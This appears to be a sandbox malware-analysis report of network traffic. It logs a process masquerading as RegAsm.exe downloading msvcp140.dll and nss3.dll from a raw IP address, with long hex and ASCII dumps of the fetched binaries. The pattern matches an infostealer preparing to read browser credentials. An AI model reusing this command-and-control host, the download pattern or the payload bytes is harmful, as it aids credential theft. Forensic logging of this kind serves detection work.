                                                                                                                                                                                                                                                                2024-05-12 10:47:18 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                                                Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                                                2024-05-12 10:47:19 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                                                Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                                                2024-05-12 10:47:19 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                                                Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                                                2024-05-12 10:47:19 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                                                Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                                                2024-05-12 10:47:19 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                                                Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                                                2024-05-12 10:47:19 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                                                Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                14192.168.2.44975065.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:20 UTC222OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:21 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:21 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:21 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                                                2024-05-12 10:47:21 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                                                Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                                                Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                                                Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                                                Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                                                Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                                                Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                                Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                                Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                                Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                15192.168.2.44975165.109.242.1124432832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-05-12 10:47:23 UTC218OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:24 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:24 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                2024-05-12 10:47:24 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                                2024-05-12 10:47:24 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                                                Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                                                2024-05-12 10:47:25 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
